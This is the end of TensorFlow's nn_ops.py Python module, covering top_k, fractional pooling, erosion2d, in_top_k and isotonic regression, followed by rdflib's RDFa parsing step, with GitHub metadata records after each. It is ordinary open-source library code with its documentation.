ret = gen_math_ops.mul(ret, gen_math_ops.cast(keep_mask, x_dtype))
if not is_executing_eagerly:
ret.set_shape(x.get_shape())
return ret
@tf_export("math.top_k", "nn.top_k")
@dispatch.add_dispatch_support
def top_k(input, k=1, sorted=True, name=None): # pylint: disable=redefined-builtin
"""Finds values and indices of the `k` largest entries for the last dimension.
If the input is a vector (rank=1), finds the `k` largest entries in the vector
and outputs their values and indices as vectors. Thus `values[j]` is the
`j`-th largest entry in `input`, and its index is `indices[j]`.
>>> result = tf.math.top_k([1, 2, 98, 1, 1, 99, 3, 1, 3, 96, 4, 1],
... k=3)
>>> result.values.numpy()
array([99, 98, 96], dtype=int32)
>>> result.indices.numpy()
array([5, 2, 9], dtype=int32)
For matrices (resp. higher rank input), computes the top `k` entries in each
row (resp. vector along the last dimension). Thus,
>>> input = tf.random.normal(shape=(3,4,5,6))
>>> k = 2
>>> values, indices = tf.math.top_k(input, k=k)
>>> values.shape.as_list()
[3, 4, 5, 2]
>>>
>>> values.shape == indices.shape == input.shape[:-1] + [k]
True
The indices can be used to `gather` from a tensor who's shape matches `input`.
>>> gathered_values = tf.gather(input, indices, batch_dims=-1)
>>> assert tf.reduce_all(gathered_values == values)
If two elements are equal, the lower-index element appears first.
>>> result = tf.math.top_k([1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0],
... k=3)
>>> result.indices.numpy()
array([0, 1, 3], dtype=int32)
Args:
input: 1-D or higher `Tensor` with last dimension at least `k`.
k: 0-D `int32` `Tensor`. Number of top elements to look for along the last
dimension (along each row for matrices).
sorted: If true the resulting `k` elements will be sorted by the values in
descending order.
name: Optional name for the operation.
Returns:
A tuple with two named fields:
values: The `k` largest elements along each last dimensional slice.
indices: The indices of `values` within the last dimension of `input`.
"""
return gen_nn_ops.top_kv2(input, k=k, sorted=sorted, name=name)
def nth_element(input, n, reverse=False, name=None): # pylint: disable=redefined-builtin
r"""Finds values of the `n`-th smallest value for the last dimension.
Note that n is zero-indexed.
If the input is a vector (rank-1), finds the entries which is the nth-smallest
value in the vector and outputs their values as scalar tensor.
For matrices (resp. higher rank input), computes the entries which is the
nth-smallest value in each row (resp. vector along the last dimension). Thus,
values.shape = input.shape[:-1]
Args:
input: 1-D or higher `Tensor` with last dimension at least `n+1`.
n: A `Tensor` of type `int32`.
0-D. Position of sorted vector to select along the last dimension (along
each row for matrices). Valid range of n is `[0, input.shape[:-1])`
reverse: An optional `bool`. Defaults to `False`.
When set to True, find the nth-largest value in the vector and vice
versa.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
The `n`-th order statistic along each last dimensional slice.
"""
return gen_nn_ops.nth_element(input, n, reverse=reverse, name=name)
@tf_export(v1=["nn.fractional_max_pool"])
@dispatch.add_dispatch_support
@deprecation.deprecated(date=None, instructions="`seed2` and `deterministic` "
"args are deprecated. Use fractional_max_pool_v2.")
def fractional_max_pool(value,
pooling_ratio,
pseudo_random=False,
overlapping=False,
deterministic=False,
seed=0,
seed2=0,
name=None): # pylint: disable=redefined-builtin
r"""Performs fractional max pooling on the input.
This is a deprecated version of `fractional_max_pool`.
Fractional max pooling is slightly different than regular max pooling. In
regular max pooling, you downsize an input set by taking the maximum value of
smaller N x N subsections of the set (often 2x2), and try to reduce the set by
a factor of N, where N is an integer. Fractional max pooling, as you might
expect from the word "fractional", means that the overall reduction ratio N
does not have to be an integer.
The sizes of the pooling regions are generated randomly but are fairly
uniform. For example, let's look at the height dimension, and the constraints
on the list of rows that will be pool boundaries.
First we define the following:
1. input_row_length : the number of rows from the input set
2. output_row_length : which will be smaller than the input
3. alpha = input_row_length / output_row_length : our reduction ratio
4. K = floor(alpha)
5. row_pooling_sequence : this is the result list of pool boundary rows
Then, row_pooling_sequence should satisfy:
1. a[0] = 0 : the first value of the sequence is 0
2. a[end] = input_row_length : the last value of the sequence is the size
3. K <= (a[i+1] - a[i]) <= K+1 : all intervals are K or K+1 size
4. length(row_pooling_sequence) = output_row_length+1
Args:
value: A `Tensor`. 4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length >= 4. Pooling ratio for
each dimension of `value`, currently only supports row and col dimension
and should be >= 1.0. For example, a valid pooling ratio looks like [1.0,
1.44, 1.73, 1.0]. The first and last elements must be 1.0 because we don't
allow pooling on batch and channels dimensions. 1.44 and 1.73 are pooling
ratio on height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`. When set to `True`,
generates the pooling sequence in a pseudorandom fashion, otherwise, in a
random fashion. Check (Graham, 2015) for difference between
pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`. When set to `True`,
it means when pooling, the values at the boundary of adjacent pooling
cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used
twice. The result would be [20, 16] for fractional max pooling.
deterministic: An optional `bool`. Deprecated; use `fractional_max_pool_v2`
instead.
seed: An optional `int`. Defaults to `0`. If set to be non-zero, the
random number generator is seeded by the given seed. Otherwise it is
seeded by a random seed.
seed2: An optional `int`. Deprecated; use `fractional_max_pool_v2` instead.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (`output`, `row_pooling_sequence`,
`col_pooling_sequence`).
output: Output `Tensor` after fractional max pooling. Has the same type as
`value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
References:
Fractional Max-Pooling:
[Graham, 2015](https://arxiv.org/abs/1412.6071)
([pdf](https://arxiv.org/pdf/1412.6071.pdf))
"""
return gen_nn_ops.fractional_max_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic, seed, seed2,
name)
@tf_export("nn.fractional_max_pool", v1=[])
@dispatch.add_dispatch_support
def fractional_max_pool_v2(value,
pooling_ratio,
pseudo_random=False,
overlapping=False,
seed=0,
name=None): # pylint: disable=redefined-builtin
r"""Performs fractional max pooling on the input.
Fractional max pooling is slightly different than regular max pooling. In
regular max pooling, you downsize an input set by taking the maximum value of
smaller N x N subsections of the set (often 2x2), and try to reduce the set by
a factor of N, where N is an integer. Fractional max pooling, as you might
expect from the word "fractional", means that the overall reduction ratio N
does not have to be an integer.
The sizes of the pooling regions are generated randomly but are fairly
uniform. For example, let's look at the height dimension, and the constraints
on the list of rows that will be pool boundaries.
First we define the following:
1. input_row_length : the number of rows from the input set
2. output_row_length : which will be smaller than the input
3. alpha = input_row_length / output_row_length : our reduction ratio
4. K = floor(alpha)
5. row_pooling_sequence : this is the result list of pool boundary rows
Then, row_pooling_sequence should satisfy:
1. a[0] = 0 : the first value of the sequence is 0
2. a[end] = input_row_length : the last value of the sequence is the size
3. K <= (a[i+1] - a[i]) <= K+1 : all intervals are K or K+1 size
4. length(row_pooling_sequence) = output_row_length+1
Args:
value: A `Tensor`. 4-D with shape `[batch, height, width, channels]`.
pooling_ratio: An int or list of `ints` that has length `1`, `2` or `4`.
Pooling ratio for each dimension of `value`, currently only supports row
and col dimension and should be >= 1.0. For example, a valid pooling ratio
looks like [1.0, 1.44, 1.73, 1.0]. The first and last elements must be 1.0
because we don't allow pooling on batch and channels dimensions. 1.44 and
1.73 are pooling ratio on height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`. When set to `True`,
generates the pooling sequence in a pseudorandom fashion, otherwise, in a
random fashion. Check paper (Graham, 2015) for difference between
pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`. When set to `True`,
it means when pooling, the values at the boundary of adjacent pooling
cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used
twice. The result would be [20, 16] for fractional max pooling.
seed: An optional `int`. Defaults to `0`. If set to be non-zero, the
random number generator is seeded by the given seed. Otherwise it is
seeded by a random seed.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (`output`, `row_pooling_sequence`,
`col_pooling_sequence`).
output: Output `Tensor` after fractional max pooling. Has the same type as
`value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
References:
Fractional Max-Pooling:
[Graham, 2015](https://arxiv.org/abs/1412.6071)
([pdf](https://arxiv.org/pdf/1412.6071.pdf))
"""
if (isinstance(pooling_ratio, (list, tuple))):
if (pooling_ratio[0] != 1.0 or pooling_ratio[-1] != 1.0):
raise ValueError(
"The first and last elements of pooling ratio must be 1.0.")
for element in pooling_ratio:
if element < 1.0:
raise ValueError("pooling_ratio should be >= 1.0.")
elif (isinstance(pooling_ratio, (int, float))):
if pooling_ratio < 1.0:
raise ValueError("pooling_ratio should be >= 1.0.")
else:
raise ValueError("pooling_ratio should be an int or a list of ints.")
pooling_ratio = _get_sequence(pooling_ratio, 2, 3, "pooling_ratio")
if seed == 0:
return gen_nn_ops.fractional_max_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic=False,
seed=0, seed2=0, name=name)
else:
seed1, seed2 = random_seed.get_seed(seed)
return gen_nn_ops.fractional_max_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic=True,
seed=seed1, seed2=seed2, name=name)
@tf_export(v1=["nn.fractional_avg_pool"])
@dispatch.add_dispatch_support
@deprecation.deprecated(date=None, instructions="`seed2` and `deterministic` "
"args are deprecated. Use fractional_avg_pool_v2.")
def fractional_avg_pool(value,
pooling_ratio,
pseudo_random=False,
overlapping=False,
deterministic=False,
seed=0,
seed2=0,
name=None): # pylint: disable=redefined-builtin
r"""Performs fractional average pooling on the input.
This is a deprecated version of `fractional_avg_pool`.
Fractional average pooling is similar to Fractional max pooling in the pooling
region generation step. The only difference is that after pooling regions are
generated, a mean operation is performed instead of a max operation in each
pooling region.
Args:
value: A `Tensor`. 4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length >= 4. Pooling ratio for
each dimension of `value`, currently only supports row and col dimension
and should be >= 1.0. For example, a valid pooling ratio looks like [1.0,
1.44, 1.73, 1.0]. The first and last elements must be 1.0 because we don't
allow pooling on batch and channels dimensions. 1.44 and 1.73 are pooling
ratio on height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`. When set to `True`,
generates the pooling sequence in a pseudorandom fashion, otherwise, in a
random fashion. Check paper (Graham, 2015) for difference between
pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`. When set to `True`,
it means when pooling, the values at the boundary of adjacent pooling
cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used
twice. The result would be [20, 16] for fractional avg pooling.
deterministic: An optional `bool`. Deprecated; use `fractional_avg_pool_v2`
instead.
seed: An optional `int`. Defaults to `0`. If set to be non-zero, the
random number generator is seeded by the given seed. Otherwise it is
seeded by a random seed.
seed2: An optional `int`. Deprecated; use `fractional_avg_pool_v2` instead.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (`output`, `row_pooling_sequence`,
`col_pooling_sequence`).
output: Output `Tensor` after fractional avg pooling. Has the same type as
`value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
References:
Fractional Max-Pooling:
[Graham, 2015](https://arxiv.org/abs/1412.6071)
([pdf](https://arxiv.org/pdf/1412.6071.pdf))
"""
return gen_nn_ops.fractional_avg_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic, seed, seed2,
name=name)
@tf_export("nn.fractional_avg_pool", v1=[])
@dispatch.add_dispatch_support
def fractional_avg_pool_v2(value,
pooling_ratio,
pseudo_random=False,
overlapping=False,
seed=0,
name=None): # pylint: disable=redefined-builtin
r"""Performs fractional average pooling on the input.
Fractional average pooling is similar to Fractional max pooling in the pooling
region generation step. The only difference is that after pooling regions are
generated, a mean operation is performed instead of a max operation in each
pooling region.
Args:
value: A `Tensor`. 4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length >= 4. Pooling ratio for
each dimension of `value`, currently only supports row and col dimension
and should be >= 1.0. For example, a valid pooling ratio looks like [1.0,
1.44, 1.73, 1.0]. The first and last elements must be 1.0 because we don't
allow pooling on batch and channels dimensions. 1.44 and 1.73 are pooling
ratio on height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`. When set to `True`,
generates the pooling sequence in a pseudorandom fashion, otherwise, in a
random fashion. Check paper (Graham, 2015) for difference between
pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`. When set to `True`,
it means when pooling, the values at the boundary of adjacent pooling
cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used
twice. The result would be [20, 16] for fractional avg pooling.
seed: An optional `int`. Defaults to `0`. If set to be non-zero, the
random number generator is seeded by the given seed. Otherwise it is
seeded by a random seed.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (`output`, `row_pooling_sequence`,
`col_pooling_sequence`).
output: Output `Tensor` after fractional avg pooling. Has the same type as
`value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
References:
Fractional Max-Pooling:
[Graham, 2015](https://arxiv.org/abs/1412.6071)
([pdf](https://arxiv.org/pdf/1412.6071.pdf))
"""
if seed == 0:
return gen_nn_ops.fractional_avg_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic=False,
seed=0, seed2=0, name=name)
else:
seed1, seed2 = random_seed.get_seed(seed)
return gen_nn_ops.fractional_avg_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic=True,
seed=seed1, seed2=seed2, name=name)
@ops.RegisterStatistics("Dilation2D", "flops")
def _calc_dilation2d_flops(graph, node):
"""Calculates the compute resources needed for Dilation2D."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
filter_shape = graph_util.tensor_shape_from_node_def_name(
graph, node.input[1])
filter_shape.assert_is_fully_defined()
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
filter_height = int(filter_shape[0])
filter_width = int(filter_shape[1])
output_count = np.prod(output_shape.as_list(), dtype=np.int64)
return ops.OpStats("flops", (output_count * filter_height * filter_width * 2))
@tf_export(v1=["nn.erosion2d"])
@dispatch.add_dispatch_support
def erosion2d(value, kernel, strides, rates, padding, name=None):
"""Computes the grayscale erosion of 4-D `value` and 3-D `kernel` tensors.
The `value` tensor has shape `[batch, in_height, in_width, depth]` and the
`kernel` tensor has shape `[kernel_height, kernel_width, depth]`, i.e.,
each input channel is processed independently of the others with its own
structuring function. The `output` tensor has shape
`[batch, out_height, out_width, depth]`. The spatial dimensions of the
output tensor depend on the `padding` algorithm. We currently only support the
default "NHWC" `data_format`.
In detail, the grayscale morphological 2-D erosion is given by:
output[b, y, x, c] =
min_{dy, dx} value[b,
strides[1] * y - rates[1] * dy,
strides[2] * x - rates[2] * dx,
c] -
kernel[dy, dx, c]
Duality: The erosion of `value` by the `kernel` is equal to the negation of
the dilation of `-value` by the reflected `kernel`.
Args:
value: A `Tensor`. 4-D with shape `[batch, in_height, in_width, depth]`.
kernel: A `Tensor`. Must have the same type as `value`.
3-D with shape `[kernel_height, kernel_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
1-D of length 4. The stride of the sliding window for each dimension of
the input tensor. Must be: `[1, stride_height, stride_width, 1]`.
rates: A list of `ints` that has length `>= 4`.
1-D of length 4. The input stride for atrous morphological dilation.
Must be: `[1, rate_height, rate_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional). If not specified "erosion2d"
is used.
Returns:
A `Tensor`. Has the same type as `value`.
4-D with shape `[batch, out_height, out_width, depth]`.
Raises:
ValueError: If the `value` depth does not match `kernel`' shape, or if
padding is other than `'VALID'` or `'SAME'`.
"""
with ops.name_scope(name, "erosion2d", [value, kernel]) as name:
# Reduce erosion to dilation by duality.
return math_ops.negative(
gen_nn_ops.dilation2d(
input=math_ops.negative(value),
filter=array_ops.reverse_v2(kernel, [0, 1]),
strides=strides,
rates=rates,
padding=padding,
name=name))
@tf_export("nn.erosion2d", v1=[])
@dispatch.add_dispatch_support
def erosion2d_v2(value,
filters,
strides,
padding,
data_format,
dilations,
name=None):
"""Computes the grayscale erosion of 4-D `value` and 3-D `filters` tensors.
The `value` tensor has shape `[batch, in_height, in_width, depth]` and the
`filters` tensor has shape `[filters_height, filters_width, depth]`, i.e.,
each input channel is processed independently of the others with its own
structuring function. The `output` tensor has shape
`[batch, out_height, out_width, depth]`. The spatial dimensions of the
output tensor depend on the `padding` algorithm. We currently only support the
default "NHWC" `data_format`.
In detail, the grayscale morphological 2-D erosion is given by:
output[b, y, x, c] =
min_{dy, dx} value[b,
strides[1] * y - dilations[1] * dy,
strides[2] * x - dilations[2] * dx,
c] -
filters[dy, dx, c]
Duality: The erosion of `value` by the `filters` is equal to the negation of
the dilation of `-value` by the reflected `filters`.
Args:
value: A `Tensor`. 4-D with shape `[batch, in_height, in_width, depth]`.
filters: A `Tensor`. Must have the same type as `value`.
3-D with shape `[filters_height, filters_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
1-D of length 4. The stride of the sliding window for each dimension of
the input tensor. Must be: `[1, stride_height, stride_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: A `string`, only `"NHWC"` is currently supported.
dilations: A list of `ints` that has length `>= 4`.
1-D of length 4. The input stride for atrous morphological dilation.
Must be: `[1, rate_height, rate_width, 1]`.
name: A name for the operation (optional). If not specified "erosion2d"
is used.
Returns:
A `Tensor`. Has the same type as `value`.
4-D with shape `[batch, out_height, out_width, depth]`.
Raises:
ValueError: If the `value` depth does not match `filters`' shape, or if
padding is other than `'VALID'` or `'SAME'`.
"""
if data_format != "NHWC":
raise ValueError("Data formats other than NHWC are not yet supported")
with ops.name_scope(name, "erosion2d", [value, filters]) as name:
# Reduce erosion to dilation by duality.
return math_ops.negative(
gen_nn_ops.dilation2d(
input=math_ops.negative(value),
filter=array_ops.reverse_v2(filters, [0, 1]),
strides=strides,
rates=dilations,
padding=padding,
name=name))
@tf_export(v1=["math.in_top_k", "nn.in_top_k"])
@dispatch.add_dispatch_support
def in_top_k(predictions, targets, k, name=None):
r"""Says whether the targets are in the top `K` predictions.
This outputs a `batch_size` bool array, an entry `out[i]` is `true` if the
prediction for the target class is finite (not inf, -inf, or nan) and among
the top `k` predictions among all predictions for example `i`. Note that the
behavior of `InTopK` differs from the `TopK` op in its handling of ties; if
multiple classes have the same prediction value and straddle the top-`k`
boundary, all of those classes are considered to be in the top `k`.
More formally, let
\\(predictions_i\\) be the predictions for all classes for example `i`,
\\(targets_i\\) be the target class for example `i`,
\\(out_i\\) be the output for example `i`,
$$out_i = predictions_{i, targets_i} \in TopKIncludingTies(predictions_i)$$
Args:
predictions: A `Tensor` of type `float32`.
A `batch_size` x `classes` tensor.
targets: A `Tensor`. Must be one of the following types: `int32`, `int64`.
A `batch_size` vector of class ids.
k: An `int`. Number of top elements to look at for computing precision.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`. Computed Precision at `k` as a `bool Tensor`.
"""
with ops.name_scope(name, "in_top_k"):
return gen_nn_ops.in_top_kv2(predictions, targets, k, name=name)
@tf_export("math.in_top_k", "nn.in_top_k", v1=[])
@dispatch.add_dispatch_support
def in_top_k_v2(targets, predictions, k, name=None):
return in_top_k(predictions, targets, k, name)
in_top_k_v2.__doc__ = in_top_k.__doc__
tf_export(v1=["nn.quantized_avg_pool"])(
dispatch.add_dispatch_support(gen_nn_ops.quantized_avg_pool))
tf_export(v1=["nn.quantized_conv2d"])(
dispatch.add_dispatch_support(gen_nn_ops.quantized_conv2d))
tf_export(v1=["nn.quantized_relu_x"])(
dispatch.add_dispatch_support(gen_nn_ops.quantized_relu_x))
tf_export(v1=["nn.quantized_max_pool"])(
dispatch.add_dispatch_support(gen_nn_ops.quantized_max_pool))
@tf_export("nn.isotonic_regression", v1=[])
@dispatch.add_dispatch_support
def isotonic_regression(inputs, decreasing=True, axis=-1):
r"""Solves isotonic regression problems along the given axis.
For each vector x, the problem solved is
$$\argmin_{y_1 >= y_2 >= ... >= y_n} \sum_i (x_i - y_i)^2.$$
As the solution is component-wise constant, a second tensor is returned that
encodes the segments. The problems are solved over the given axis.
Consider the following example, where we solve a batch of two problems. The
first input is [3, 1, 2], while the second [1, 3, 4] (as the axis is 1).
>>> x = tf.constant([[3, 1, 2], [1, 3, 4]], dtype=tf.float32)
>>> y, segments = tf.nn.isotonic_regression(x, axis=1)
>>> y # The solution.
<tf.Tensor: shape=(2, 3), dtype=float32, numpy=
array([[3. , 1.5 , 1.5 ],
[2.6666667, 2.6666667, 2.6666667]], dtype=float32)>
Note that the first solution has two blocks [2] and [1.5, 1.5]. The second
solution is constant, and thus has a single segment. These segments are
exactly what the second returned tensor encodes:
>>> segments
<tf.Tensor: shape=(2, 3), dtype=int32, numpy=
array([[0, 1, 1],
[0, 0, 0]], dtype=int32)>
Args:
inputs: A tensor holding the inputs.
decreasing: If set to False, the inequalities in the optimizing constrained
are flipped.
axis: The axis along which the problems should be solved.
Returns:
output: The solutions, same shape as type as the input.
segments: An int32 tensor, same shape as the input indicating the segments
that have the same value. Specifically, those positions that have the same
value correspond to the same segment. These values start at zero, and are
monotonously increasing for each solution.
"""
type_promotions = {
# Float types get mapped to themselves, int8/16 to float32, rest to double
dtypes.float32:
dtypes.float32,
dtypes.half:
dtypes.half,
dtypes.bfloat16:
dtypes.bfloat16,
dtypes.int8:
dtypes.float32,
dtypes.int16:
dtypes.float32,
}
inputs = ops.convert_to_tensor(inputs)
try:
output_dtype = type_promotions[inputs.dtype]
except KeyError:
output_dtype = dtypes.float64
def compute_on_matrix(matrix, name=None):
iso_fn = functools.partial(
gen_nn_ops.isotonic_regression, output_dtype=output_dtype, name=name)
if decreasing:
return iso_fn(matrix)
else:
output, segments = iso_fn(-matrix)
return -output, segments
return _wrap_2d_function(inputs, compute_on_matrix, axis)
| {
"content_hash": "99b4a6e5ea504bdc7cf7850605155ba1",
"timestamp": "",
"source": "github",
"line_count": 6025,
"max_line_length": 116,
"avg_line_length": 40.55668049792531,
"alnum_prop": 0.653969241346571,
"repo_name": "sarvex/tensorflow",
"id": "3b1c3539eb989f6d05366ce54754c9d19f2c1c7b",
"size": "245043",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tensorflow/python/ops/nn_ops.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "148184"
},
{
"name": "C++",
"bytes": "6224499"
},
{
"name": "CSS",
"bytes": "107"
},
{
"name": "HTML",
"bytes": "650478"
},
{
"name": "Java",
"bytes": "53519"
},
{
"name": "JavaScript",
"bytes": "6659"
},
{
"name": "Jupyter Notebook",
"bytes": "777935"
},
{
"name": "Objective-C",
"bytes": "1288"
},
{
"name": "Protocol Buffer",
"bytes": "61743"
},
{
"name": "Python",
"bytes": "3474762"
},
{
"name": "Shell",
"bytes": "45640"
},
{
"name": "TypeScript",
"bytes": "283668"
}
],
"symlink_target": ""
} |
"""
The core parsing function of RDFa. Some details are
put into other modules to make it clearer to update/modify (eg, generation of literals, or managing the current state).
@summary: RDFa core parser processing step
@requires: U{RDFLib package<http://rdflib.net>}
@organization: U{World Wide Web Consortium<http://www.w3.org>}
@author: U{Ivan Herman<a href="http://www.w3.org/People/Ivan/">}
@license: This software is available for use under the
U{W3C® SOFTWARE NOTICE AND LICENSE<href="http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231">}
"""
from rdflib.term import BNode, URIRef
from rdflib.namespace import RDF
from rdflib.plugins.parsers.rdfa.state import ExecutionContext
from rdflib.plugins.parsers.rdfa.literal import generate_literal
from rdflib.plugins.parsers.rdfa.embeddedrdf import handle_embeddedRDF
from rdflib.plugins.parsers.rdfa.options import GENERIC_XML, XHTML_RDFA, HTML5_RDFA
__all__ = ['parse_one_node']
def parse_one_node(node, graph, parent_object, incoming_state, parent_incomplete_triples):
"""The (recursive) step of handling a single node. See the
U{RDFa syntax document<http://www.w3.org/TR/rdfa-syntax>} for further details.
@param node: the DOM node to handle
@param graph: the RDF graph
@type graph: RDFLib's Graph object instance
@param parent_object: the parent's object, as an RDFLib URIRef
@param incoming_state: the inherited state (namespaces, lang, etc)
@type incoming_state: L{State.ExecutionContext}
@param parent_incomplete_triples: list of hanging triples (the missing resource set to None) to be handled (or not)
by the current node.
@return: whether the caller has to complete it's parent's incomplete triples
@rtype: Boolean
"""
def _get_resources_for_attr(attr):
"""Get a series of resources encoded via CURIE-s for an attribute on a specific node.
@param attr: the name of the attribute
@return: a list of RDFLib URIRef instances
"""
if not node.hasAttribute(attr):
return []
else:
rel = (attr == "rel") or (attr == "rev")
prop = (attr == "property")
return state.get_resources(node.getAttribute(attr), rel, prop)
# Update the state. This means, for example, the possible local settings of
# namespaces and lang
state = ExecutionContext(node, graph, inherited_state=incoming_state)
#---------------------------------------------------------------------------------
# Handle the special case for embedded RDF, eg, in SVG1.2.
# This may add some triples to the target graph that does not originate from RDFa parsing
# If the function return TRUE, that means that an rdf:RDF has been found. No
# RDFa parsing should be done on that subtree, so we simply return...
if state.options.host_language == GENERIC_XML and node.nodeType == node.ELEMENT_NODE and handle_embeddedRDF(node, graph, state):
return
#---------------------------------------------------------------------------------
# First, let us check whether there is anything to do at all. Ie,
# whether there is any relevant RDFa specific attribute on the element
#
if not _has_one_of_attributes(node, "href", "resource", "about", "property", "rel", "rev", "typeof", "src"):
# nop, there is nothing to do here, just go down the tree and return...
for n in node.childNodes:
if n.nodeType == node.ELEMENT_NODE : parse_one_node(n, graph, parent_object, state, parent_incomplete_triples)
return
#-----------------------------------------------------------------
# The goal is to establish the subject and object for local processing
# The behaviour is slightly different depending on the presense or not
# of the @rel/@rev attributes
current_subject = None
current_object = None
if _has_one_of_attributes(node, "rel", "rev"):
# in this case there is the notion of 'left' and 'right' of @rel/@rev
# in establishing the new Subject and the objectResource
# set first the subject
if node.hasAttribute("about"):
current_subject = state.get_Curie_ref(node.getAttribute("about"))
elif node.hasAttribute("src"):
current_subject = state.get_URI_ref(node.getAttribute("src"))
elif node.hasAttribute("typeof"):
current_subject = BNode()
# get_URI_ref may return None in case of an illegal Curie, so
# we have to be careful here, not use only an 'else'
if current_subject == None:
current_subject = parent_object
# set the object resource
if node.hasAttribute("resource"):
current_object = state.get_Curie_ref(node.getAttribute("resource"))
elif node.hasAttribute("href"):
current_object = state.get_URI_ref(node.getAttribute("href"))
else:
# in this case all the various 'resource' setting attributes
# behave identically, except that their value might be different
# in terms of CURIE-s and they also have their own priority, of course
if node.hasAttribute("about"):
current_subject = state.get_Curie_ref(node.getAttribute("about"))
elif node.hasAttribute("src"):
current_subject = state.get_URI_ref(node.getAttribute("src"))
elif node.hasAttribute("resource"):
current_subject = state.get_Curie_ref(node.getAttribute("resource"))
elif node.hasAttribute("href"):
current_subject = state.get_URI_ref(node.getAttribute("href"))
elif node.hasAttribute("typeof"):
current_subject = BNode()
# get_URI_ref may return None in case of an illegal Curie, so
# we have to be careful here, not use only an 'else'
if current_subject == None:
current_subject = parent_object
# in this case no non-literal triples will be generated, so the
# only role of the current_objectResource is to be transferred to
# the children node
current_object = current_subject
# ---------------------------------------------------------------------
# The possible typeof indicates a number of type statements on the newSubject
for defined_type in _get_resources_for_attr("typeof"):
graph.add((current_subject, RDF.type, defined_type))
# ---------------------------------------------------------------------
# In case of @rel/@rev, either triples or incomplete triples are generated
# the (possible) incomplete triples are collected, to be forwarded to the children
incomplete_triples = []
for prop in _get_resources_for_attr("rel"):
theTriple = (current_subject, prop, current_object)
if current_object != None:
graph.add(theTriple)
else:
incomplete_triples.append(theTriple)
for prop in _get_resources_for_attr("rev"):
theTriple = (current_object, prop, current_subject)
if current_object != None:
graph.add(theTriple)
else:
incomplete_triples.append(theTriple)
# ----------------------------------------------------------------------
# Generation of the literal values. The newSubject is the subject
# A particularity of property is that it stops the parsing down the DOM tree if an XML Literal is generated,
# because everything down there is part of the generated literal. For this purpose the recurse flag is set (and used later
# in the parsing process).
if node.hasAttribute("property"):
# Generate the literal. It has been put it into a separate module to make it more managable
# the overall return value should be set to true if any valid triple has been generated
recurse = generate_literal(node, graph, current_subject, state)
else:
recurse = True
# ----------------------------------------------------------------------
# Setting the current object to a bnode is setting up a possible resource
# for the incomplete triples downwards
if current_object == None:
object_to_children = BNode()
else:
object_to_children = current_object
#-----------------------------------------------------------------------
# Here is the recursion step for all the children
if recurse:
for n in node.childNodes:
if n.nodeType == node.ELEMENT_NODE:
parse_one_node(n, graph, object_to_children, state, incomplete_triples)
# ---------------------------------------------------------------------
# At this point, the parent's incomplete triples may be completed
for s, p, o in parent_incomplete_triples:
if s == None: s = current_subject
if o == None: o = current_subject
graph.add((s, p, o))
# -------------------------------------------------------------------
# This should be it...
# -------------------------------------------------------------------
return
def _has_one_of_attributes(node, *args):
"""
Check whether one of the listed attributes is present on a (DOM) node.
@param node: DOM element node
@param args: possible attribute names
@return: True or False
@rtype: Boolean
"""
return True in [ node.hasAttribute(attr) for attr in args ]
| {
"content_hash": "6493146f1fb9dfc2c268c1e425bb47ac",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 132,
"avg_line_length": 47.03517587939699,
"alnum_prop": 0.6112179487179488,
"repo_name": "Letractively/rdflib",
"id": "d5b411fe199697f03cb985511485a5e15f7ae7f1",
"size": "9385",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rdflib/plugins/parsers/rdfa/parse.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "119350"
},
{
"name": "Python",
"bytes": "588422"
},
{
